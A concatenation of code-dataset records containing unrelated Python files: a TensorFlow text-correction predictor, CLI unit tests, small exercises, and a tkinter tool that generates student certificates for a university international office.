self.__load_vocab(model_path+self.__vocab_file)\r\n self.__word2idx = word2idx\r\n self.__idx2word = idx2word\r\n self._input_len = input_len\r\n self._output_len = output_len\r\n #加载模型\r\n ##加载多个模型并同时运行有可能导致内存爆掉\r\n self.__graph=tf.Graph()\r\n sess = tf.Session(graph=self.__graph)\r\n self.__sess = sess\r\n with self.__graph.as_default():\r\n ## Restore parameters and session\r\n restore_saver = tf.train.import_meta_graph(model_path+'/model.meta')\r\n restore_saver.restore(sess, tf.train.latest_checkpoint(model_path))\r\n self.__preds = tf.get_default_graph().get_tensor_by_name(\"predict_y:0\")\r\n self.__x = tf.get_default_graph().get_tensor_by_name(\"input_x:0\")\r\n\r\n def __padding(self,sentence):\r\n if len(sentence)>self._input_len-1:\r\n sentence =sentence[0:self._input_len-1]\r\n sentence.append(3) #\r\n else:\r\n sentence.append(3)\r\n if len(sentence)\")[0].strip()\r\n result.append(got)\r\n return result\r\n\r\n def predict(self,sentence):\r\n sentence = [sentence]\r\n sentence = self.batch_predict(sentence)\r\n return sentence[0]\r\n\r\n def batch_predict(self,sentences):\r\n batch_size = self.__batch_size\r\n X = self.__prepro(sentences)\r\n batch_num = len(sentences)//batch_size\r\n left_num = len(sentences)%batch_size\r\n results = []\r\n for i in range(batch_num):\r\n x_ = X[i*batch_size:(i+1)*batch_size]\r\n x_ = self.__common_predict(x_)\r\n results.extend(x_)\r\n if left_num > 0:\r\n x_ = X[batch_num * batch_size:len(sentences)]\r\n x_ = self.__common_predict(x_)\r\n results.extend(x_)\r\n return results\r\n\r\n def __load_vocab(self,vocab_fpath):\r\n '''Loads vocabulary file and returns idx<->token maps\r\n vocab_fpath: string. 
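shape_reconition.py above keys every classification off cv2.approxPolyDP with epsilon at 1% of the contour perimeter — the main tuning knob: too small and edge noise inflates the vertex count, too large and distinct polygons collapse into quadrilaterals. A small probe on a synthetic mask:

import cv2
import numpy as np

mask = np.zeros((200, 200), np.uint8)
cv2.rectangle(mask, (40, 40), (160, 120), 255, -1)   # one filled rectangle

contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
c = contours[0]
for frac in (0.001, 0.01, 0.05):
    approx = cv2.approxPolyDP(c, frac * cv2.arcLength(c, True), True)
    print(frac, len(approx))    # vertex count shrinks as epsilon grows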
vocabulary file path.\r\n Note that these are reserved\r\n 0: , 1: , 2: , 3: \r\n Returns\r\n two dictionaries.\r\n '''\r\n vocab = [line.split('=&=')[0] for line in open(vocab_fpath, 'r', encoding='utf-8').read().splitlines()]\r\n token2idx = {token: idx for idx, token in enumerate(vocab)}\r\n idx2token = {idx: token for idx, token in enumerate(vocab)}\r\n return token2idx, idx2token\r\n\r\ndef get_standard_time():\r\n return datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S.%f\")\r\n\r\nif __name__ == '__main__':\r\n cm = CorrectModel('company','logdir/',112,27,16)\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n oo = cm.predict('hello world')\r\n print(get_standard_time())\r\n\r\n batchs = ['sdfsadfsadfasfdfsadf','dfasdfasdfsadf','dfsadfsadfsdsadf','fasfefefevevefef','effverthhjthth','iukuikyjrtheh']\r\n print(oo)\r\n\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n print(get_standard_time())\r\n oo = cm.batch_predict(batchs)\r\n print(get_standard_time())\r\n\r\n import time\r\n time.sleep(10)\r\n print(\"Done\")\r\n\r\n","sub_path":"predict.py","file_name":"predict.py","file_ext":"py","file_size_in_byte":5370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368789744","text":"from pytest import raises\n\nfrom xii import cli\nfrom xii.extension import ExtensionManager\n\n# test ext_mgr\next_mgr = ExtensionManager()\next_mgr.add_builtin_path()\next_mgr.load()\n\n\nclass FakeRegisterAvailable():\n def __init__(self, commands):\n self._commands = commands\n\n def available(self):\n return self._commands\n\n\ndef test_usage_text():\n result = cli.usage_text(ext_mgr)\n\n assert(\"xii [OPTIONS]\" in result)\n assert(\"Commands available:\" in result)\n assert(\"d destroy\" in result)\n assert(\"s start\" in result)\n\n\ndef test_cli_arg_parser():\n parser = cli.cli_arg_parser(ext_mgr)\n\n result = parser.parse_args([\n \"--no-parallel\",\n \"--deffile\", \"/tmp/xii/config\",\n \"-Dtest=true\", \"-D\", \"foo=bar\",\n \"start\",\n \"foo\"\n ])\n\n assert(result.parallel is False)\n assert(result.deffile == \"/tmp/xii/config\")\n assert(result.defines == [\"test=true\", \"foo=bar\"])\n assert(result.command == \"start\")\n assert(result.command_args == [\"foo\"])\n\n\n\ndef test_run_cli(monkeypatch, capsys):\n pass\n","sub_path":"tests/unit/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"358993184","text":"import os\nimport re\n\n\ndef ex4(xml_path, d):\n res = []\n xml_content = open(os.path.join(os.getcwd(), xml_path), 'r').read()\n r = r'<\\s*\\w+\\s+'\n for key in d:\n r += r'(' + key + r'\\s+=\\s+\"' + d[key] + r')*' + r'.+'\n r += r'>.+'\n r = re.compile(r)\n for line in xml_content.split('\\n'):\n if r.match(line):\n res.append(line)\n return res\n\n\nd = {\n \"class\": \"url\",\n \"name\": \"url\",\n \"date-id\": \"item\"\n}\nprint(ex4('xml_file.xml', 
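The vocabulary docstring in predict.py above lost its reserved-token names to HTML stripping; judging from the surviving ids (0 used for padding, 3 appended as the end marker and split on during postprocessing), they were presumably the conventional pad/unk/start/end tokens. A sketch of the fixed-length padding under that assumption:

# Assumed reserved ids, reconstructed from context: 0 = pad, 3 = end-of-sentence.
def pad_sentence(ids, max_len, eos_id=3, pad_id=0):
    ids = ids[:max_len - 1]                  # leave room for the end marker
    ids.append(eos_id)
    ids.extend([pad_id] * (max_len - len(ids)))
    return ids

print(pad_sentence([5, 9, 12], 8))           # [5, 9, 12, 3, 0, 0, 0, 0]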
d))\n","sub_path":"an3/python/lab11/ex5.py","file_name":"ex5.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"330122080","text":"import sys\n\nmoney = {\n\t1: 'PENNY',\n\t5: 'NICKEL',\n\t10: 'DIME',\n\t25: 'QUARTER',\n\t50: 'HALF DOLLAR',\n\t100: 'ONE',\n\t200: 'TWO',\n\t500: 'FIVE',\n\t1000: 'TEN',\n\t2000: 'TWENTY',\n\t5000: 'FIFTY',\n\t10000: 'ONE HUNDRED'\n}\n\ndef main():\n\twith open(sys.argv[1]) as f:\n\t\tfor line in f:\n\t\t\tif line.strip():\n\t\t\t\tpp, ch = [int(i * 100) for i in map(float, line.split(';'))]\n\t\t\t\tresult = []\n\t\t\t\tif pp == ch:\n\t\t\t\t\tprint(\"ZERO\")\n\t\t\t\telif ch < pp:\n\t\t\t\t\tprint(\"ERROR\")\n\t\t\t\telse:\n\t\t\t\t\tdiff = ch - pp\n\t\t\t\t\tfor i in sorted(money, reverse=True):\n\t\t\t\t\t\twhile diff // i > 0:\n\t\t\t\t\t\t\tdiff -= i\n\t\t\t\t\t\t\tresult.append(money[i])\n\t\t\t\t\tprint(','.join(result))\n\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Codeeval/Cash Register/P.py","file_name":"P.py","file_ext":"py","file_size_in_byte":657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"442769533","text":"from GameLogic.Figure import Figure\nclass Pawn(Figure):\n def turns(self,field,pos):\n i,j = pos\n turns =[]\n for k in range(1):\n if not i+k >7:\n if field[i+k][j]==0:\n turns.append((i,j))\n return turns","sub_path":"GameLogic/Pawn.py","file_name":"Pawn.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344744117","text":"#-*- coding: utf-8 -*-\r\nimport os\r\nimport time\r\nimport datetime\r\nimport docx\r\nimport xlrd\r\nfrom docx import Document\r\nfrom docx.enum.text import WD_ALIGN_PARAGRAPH\r\nimport tkinter as tk\r\nfrom tkinter.messagebox import *\r\n\r\nclass Graduate:\r\n\tdef __init__(self,root):\r\n\t\tself.todolist=[]\r\n\t\tworkbook = xlrd.open_workbook('graduate.xlsx')\r\n\t\ttable = workbook.sheets()[0]\r\n\t\tnrows = table.nrows\r\n\t\tncols = table.ncols\r\n\t\tfor i in range(0,nrows):\r\n\t\t\trow_list=[]\r\n\t\t\trowValues= table.row_values(i) \r\n\t\t\tself.todolist.append(rowValues)\r\n\t\tself.todolist.remove(self.todolist[0])\r\n\t\t\r\n\t\tframe=tk.Frame(root)\r\n\t\tframe.pack()\r\n\t\ttk.Button(frame,text='No Criminal Certificate',command=self.loopNCC).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Migration Certificate',command=self.loopMC).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Study Certificate (Chinese)',command=self.loopSC_CN).pack(side=tk.LEFT)\r\n\t\ttk.Button(frame,text='Study Certificate (English)',command=self.loopSC_EN).pack(side=tk.LEFT)\r\n\t\tframe=tk.Frame(root)\r\n\t\tframe.pack()\r\n\r\n\t\ttk.Label(root,text='\\nPowered by@ShaoTech\\nCopyriht © 大理大学留学生教育服务中心 版权所有\\n如有问题请联系:石少华,Email: shi.sh@foxmail.com').pack(side=tk.BOTTOM)\r\n\t\tREADME_btn=tk.Button(frame,text='使用说明',command=self.ReadMe)\r\n\t\tREADME_btn.pack(side=tk.TOP)\r\n\r\n\tdef ReadMe(self):\r\n\t\t#os.system('README.txt')\r\n\t\tshowinfo('使用说明','\\n此程序所在文件夹中需有如下两个文件:\\n1. 命名为graduate.xlsx的Excel文件。此文件为待做学生信息文件,Excel第一行为表头,从左到右应依次为:\\n序号,学号,护照姓名,中文名,性别(格式为Male/Female),护照号,生日(英文),国籍(英文)\\n2. 命名为template_blank.docx的大理大学留学生教育服务中心模版文件。若无此文件,生成的文件中将无页眉页脚。\\n\\n使用方法:\\n1. 将待做学生信息写入graduate.xlsx\\n2. 
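The Cash Register solution above converts dollars to cents with int(i * 100), which truncates under binary floating point — int(0.29 * 100) evaluates to 28 — so round() is the safer conversion. The greedy loop itself is only guaranteed optimal (and guaranteed to terminate with exact change) because US denominations form a canonical coin system with a PENNY. A condensed sketch with a trimmed denomination table:

MONEY = {2000: 'TWENTY', 500: 'FIVE', 100: 'ONE', 25: 'QUARTER',
         10: 'DIME', 5: 'NICKEL', 1: 'PENNY'}   # subset of the record's table

def change(pp, ch):
    diff = round(ch * 100) - round(pp * 100)    # cents, safely rounded
    out = []
    for coin in sorted(MONEY, reverse=True):
        n, diff = divmod(diff, coin)            # take as many as fit, keep rest
        out += [MONEY[coin]] * n
    return ','.join(out) if out else 'ZERO'

print(change(15.33, 16.00))   # QUARTER,QUARTER,DIME,NICKEL,PENNY,PENNY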
直接双击运行graduate_tk.py')\r\n\t\t\r\n\tdef NCC(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('CERTIFICATE OF NO CRIMINAL RECORD')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\tdate_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\tdate.add_run('th').font.superscript = True\r\n\t\tdate.add_run(', 2019\\n')\r\n\t\t\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tGrade='20'+row[1][2:4]\r\n\t\tif row[1][0]=='Y' or row[1][0]=='y':\r\n\t\t\tGrade=row[1][1:5]\r\n\t\tbody_txt='''This is to certify that %s%s (passport No. %s; student No. %s) has no disciplinary records against the rules and regulations of Dali University and has no Chinese judicial office records of committing any offense against Chinese criminal laws during %s study in P.R. China from September %s to till now.\\n\\nCertified by\\n'''%(Sex,Name,PPNo,RollNo,HeShe,Grade)\r\n\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tbody.paragraph_format.line_spacing = docx.shared.Pt(30)\r\n\r\n\t\tinscription='\\n\\n\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\t\r\n\t\tins=doc.add_paragraph()\r\n\t\tins.paragraph_format.line_spacing = docx.shared.Pt(25)\r\n\t\tins_run=ins.add_run(inscription)\r\n\t\tins_run.font.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('NCC_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\t\t\t\r\n\tdef MC(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('MIGRATION CERTIFICATE')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\tdate_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\tdate.add_run('th').font.superscript = True\r\n\t\tdate.add_run(', 2019\\n')\r\n\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tDOB=row[6]\r\n\t\tNation=row[7]\r\n\r\n\t\tbody_txt='''This university has no objection to the admission of %s%s, from %s, bearing Dali University’s registration No. %s, passport No. 
%s, born on %s, for %s further study in any institution or university in any country.\\n\\nWe wish %s success in life.\\n\\n\\n'''%(Sex,Name,Nation,RollNo,PPNo,DOB,HeShe,HeShe)\r\n\t\tinfoNeed=list([Sex,Name,Nation,RollNo,PPNo,DOB,HeShe,HeShe])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint ('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tparagraph_format = body.paragraph_format\r\n\t\tparagraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\tinscription='\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\r\n\t\tins_run=body.add_run(inscription)\r\n\t\tfont = ins_run.font\r\n\t\tfont.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('MC_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\r\n\tdef SC_CN(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('在 读 证 明\\n\\n')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\t\t\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='女'\r\n\t\telse:\r\n\t\t\tSex='男'\r\n\t\tName=row[2]\r\n\t\tName_CN=row[3]\r\n\t\tPPNo=row[5]\r\n\t\tNation=row[7]\r\n\t\tif 'India' in Nation:\r\n\t\t\tNation='印度'\r\n\t\telif 'Nepal' in Nation:\r\n\t\t\tNation='尼泊尔'\r\n\t\telif 'Pakistan' in Nation:\r\n\t\t\tNation='巴基斯坦'\r\n\t\telif 'Bangladesh' in Nation:\r\n\t\t\tNation='孟加拉国'\r\n\t\telif 'Ivory Cost' in Nation:\r\n\t\t\tNation='科特迪瓦'\r\n\t\telif 'Laos' in Nation:\r\n\t\t\tNation='老挝'\r\n\t\telif 'Cambodia' in Nation:\r\n\t\t\tNation='柬埔寨'\r\n\t\telif 'Tanzania' in Nation:\r\n\t\t\tNation='坦桑尼亚'\r\n\t\telif 'Viet' in Nation:\r\n\t\t\tNation='越南'\r\n\t\telif 'Somalia' in Nation:\r\n\t\t\tNation='索马里'\r\n\t\telif 'Burma' in Nation or 'Myanmar' in Nation:\r\n\t\t\tNation='缅甸'\r\n\t\telif 'Zambia' in Nation:\r\n\t\t\tNation='赞比亚'\r\n\t\telif 'Yemen' in Nation:\r\n\t\t\tNation='也门'\r\n\t\telif 'Mongolia' in Nation:\r\n\t\t\tNation='蒙古'\r\n\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody.paragraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\t\r\n\t\tbody.add_run(' 兹证明')\r\n\t\tbody.add_run('%s'%Name).font.underline = True\r\n\r\n\t\tbody.add_run(',性别')\r\n\t\tbody.add_run('%s'%Sex).font.underline = True\r\n\t\t\r\n\t\tbody.add_run(',中文名')\r\n\t\tbody.add_run('%s'%Name_CN).font.underline = True\r\n\r\n\t\tbody.add_run(',国籍')\r\n\t\tbody.add_run('%s'%Nation).font.underline = True\r\n\r\n\t\tbody.add_run(',护照号码')\r\n\t\tbody.add_run('%s'%PPNo).font.underline = True\r\n\r\n\t\tbody.add_run(',为我校')\r\n\t\tbody.add_run('临床医学院2013级临床医学专业本科生').font.underline = True\r\n\t\tbody.add_run('。该生于2013年10月入学,2019年7月从我校毕业。\\n\\n\\t特此证明。\\n\\n')\r\n\r\n\t\tinfoNeed=list([Sex,Name,Name_CN,PPNo,Nation])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint 
('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\r\n\t\tyear='年'\r\n\t\tmonth='月'\r\n\t\tday='日'\r\n\t\tcc=time.localtime(time.time())\r\n\t\tend_txt='大理大学留学生教育服务中心\\n%s'%str(cc.tm_year)+year+str(cc.tm_mon)+month+str(cc.tm_mday)+day\r\n\t\t#end_txt='大理大学留学生教育服务中心\\n2019年6月25日'\r\n\t\tend=doc.add_paragraph()\r\n\t\tend_run=end.add_run(end_txt)\r\n\t\tparagraph_format = end.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\ttoday_appen = datetime.date.today()\r\n\t\t\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\t\t\r\n\t\telse:\r\n\t\t\tdoc.save('SC_CN_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\r\n\tdef SC_EN(self,doc,row,newPage):\r\n\t\ttitle=doc.add_paragraph()\r\n\t\ttitle_run=title.add_run('STUDY CERTIFICATE')\r\n\t\tfont = title_run.font\r\n\t\t#font.name = 'Calibri'\r\n\t\tfont.bold = True\r\n\t\tfont.size = docx.shared.Pt(22)\r\n\t\tparagraph_format = title.paragraph_format\r\n\t\tparagraph_format.alignment = WD_ALIGN_PARAGRAPH.CENTER\r\n\r\n\t\tdate=doc.add_paragraph()\r\n\t\tdate.paragraph_format.alignment = WD_ALIGN_PARAGRAPH.RIGHT\r\n\t\tnow = datetime.datetime.now()\r\n\t\ttoday=now.strftime(\"%B %d, %Y\")\r\n\t\tdate_txt='\\n%s\\n'%today\r\n\t\t#date_txt='\\nJune 25'\r\n\t\tdate.add_run(date_txt)\r\n\t\t#date.add_run('th').font.superscript = True\r\n\t\t#date.add_run(', 2019\\n')\r\n\r\n\t\tRollNo=row[1]\r\n\t\tSex=row[4]\r\n\t\tif 'Female' in Sex:\r\n\t\t\tSex='Ms. '\r\n\t\t\tHeShe='her'\r\n\t\t\tHe='She'\r\n\t\telse:\r\n\t\t\tSex='Mr. '\r\n\t\t\tHeShe='his'\r\n\t\t\tHe='He'\r\n\t\tName=row[2]\r\n\t\tPPNo=row[5]\r\n\t\tDOB=row[6]\r\n\t\tNation=row[7]\r\n\t\tMajor='Clinical Medicine'\r\n\t\tSchool='Clinical Medicine College'\r\n\t\tGrade='20'+row[1][2:4]\r\n\t\tif row[1][0]=='Y' or row[1][0]=='y':\r\n\t\t\tGrade=row[1][1:5]\r\n\t\ttoyear=now.strftime(\"%Y\")\r\n\t\tyear_count=int(toyear)-int(Grade)\r\n\t\tif year_count ==0:\r\n\t\t\tyear_count='first'\r\n\t\telif year_count ==1:\r\n\t\t\tyear_count='first'\r\n\t\telif year_count ==2:\r\n\t\t\tyear_count='second'\r\n\t\telif year_count ==3:\r\n\t\t\tyear_count='third'\r\n\t\telif year_count ==4:\r\n\t\t\tyear_count='fourth'\r\n\t\telif year_count ==5:\r\n\t\t\tyear_count='fifth'\r\n\t\telif year_count ==6:\r\n\t\t\tyear_count='sixth'\r\n\t\telif year_count ==7:\r\n\t\t\tyear_count='seventh'\r\n\t\telif year_count ==8:\r\n\t\t\tyear_count='eighth'\r\n\r\n\t\tbody_txt='''TO WHOM IT MAY CONCERN:\\n\\nThis is to certify that %s%s (passport No. %s) majoring in %s is studying in %s of Dali University since September, %s. %s has been promoted to %s %s academic year studying in the year of %s.\\n\\nSincerely yours\\n'''%(Sex,Name,PPNo,Major,School,Grade,He,HeShe,year_count,toyear)\r\n\t\tinfoNeed=list([Sex,Name,PPNo,Major,School,Grade,He,HeShe,year_count,toyear])\r\n\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\tprint ('有缺失信息,请补全后再试!')\r\n\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\tbody=doc.add_paragraph()\r\n\t\tbody_run=body.add_run(body_txt)\r\n\t\tparagraph_format = body.paragraph_format\r\n\t\tparagraph_format.line_spacing = docx.shared.Pt(30)\r\n\t\tinscription='\\n\\nMs. Zhou Lin\\nDeputy Director\\nEducation & Service Center for International Students\\nDali University\\nNo. 2 Hongsheng Road, Dali, Yunnan 671003, P. R. 
CHINA\\nEmail: leanne927cn@hotmail.com\\nTelephone: +86-872-221-8978 Fax:+86-872-221-8979'\r\n\t\tins_run=body.add_run(inscription)\r\n\t\tfont = ins_run.font\r\n\t\tfont.bold = True\r\n\r\n\t\ttoday_appen = datetime.date.today()\r\n\r\n\t\tif newPage=='Y':\r\n\t\t\tdoc.add_page_break()\r\n\t\t\tdoc.add_paragraph()\r\n\t\telse:\r\n\t\t\tdoc.save('SC_EN_%s.docx'%today_appen)\r\n\t\t\tshowinfo('提示','生成完毕!')\r\n\t\t\t\r\n\tdef loopNCC(self):#No Criminal Certificate\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.NCC(doc,row,newPage)\r\n\t\t\r\n\tdef loopMC(self):#Migration Certificate\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5],row[6],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.MC(doc,row,newPage)\r\n\r\n\t\t\r\n\tdef loopSC_CN(self):#Study Certificate in Chinese language\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[3],row[4],row[5],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.SC_CN(doc,row,newPage)\r\n\r\n\t\t\r\n\tdef loopSC_EN(self):#Study Certificate in English language\r\n\t\tdoc = Document('.\\\\template_blank.docx')\r\n\t\tstyle = doc.styles['Normal']\r\n\t\tfont = style.font\r\n\t\tfont.name = 'Times New Roman'\r\n\t\tfont.size = docx.shared.Pt(16)\r\n\t\tfor row in self.todolist:\r\n\t\t\tinfoNeed=list([row[1],row[2],row[4],row[5],row[6],row[7]])\r\n\t\t\tif len([a for a in infoNeed if a.strip()==''])>0:\r\n\t\t\t\tshowinfo('提示','有必填信息缺失,请补全后再试!')\r\n\t\t\t\tbreak\r\n\t\t\tif row!=self.todolist[-1]:\r\n\t\t\t\tnewPage='Y'\r\n\t\t\telse:\r\n\t\t\t\tnewPage='N'\r\n\t\t\tself.SC_EN(doc,row,newPage)\r\n\t\t\r\nroot=tk.Tk()\r\nroot.title('学生各类证明生成器')\r\n#root.geometry('370x850')\r\n#root.minsize(200, 200)\r\n\r\nSelect=tk.Label(root,text='\\n请选择要生成的文件')\r\nSelect.pack()\r\n\r\napp=Graduate(root)\r\nroot.mainloop()\r\n","sub_path":"graduate_tk.py","file_name":"graduate_tk.py","file_ext":"py","file_size_in_byte":14145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"407789065","text":"from django.urls import include, path\n\nfrom .views import CRMListView, CRMCreateView\n\napp_name = 'crm'\nurlpatterns = [\n path('list/', include([\n path('create/', CRMCreateView.as_view(), name='create'),\n path('', CRMListView.as_view(), name='list'),\n # path('/', 
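Each certificate builder in graduate_tk.py above computes today's date but then overwrites it with a hardcoded "June 25th, 2019". A helper that renders any date with the proper ordinal superscript keeps the generated documents current; a sketch against a blank document (the real code loads template_blank.docx):

import datetime
from docx import Document

def add_ordinal_date(paragraph, when=None):
    when = when or datetime.date.today()
    # 11th-13th are irregular; otherwise the suffix follows the last digit.
    suffix = ('th' if 11 <= when.day <= 13
              else {1: 'st', 2: 'nd', 3: 'rd'}.get(when.day % 10, 'th'))
    paragraph.add_run('\n%s %d' % (when.strftime('%B'), when.day))
    paragraph.add_run(suffix).font.superscript = True   # e.g. June 25th
    paragraph.add_run(', %d\n' % when.year)

doc = Document()
add_ordinal_date(doc.add_paragraph())
doc.save('date_demo.docx')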
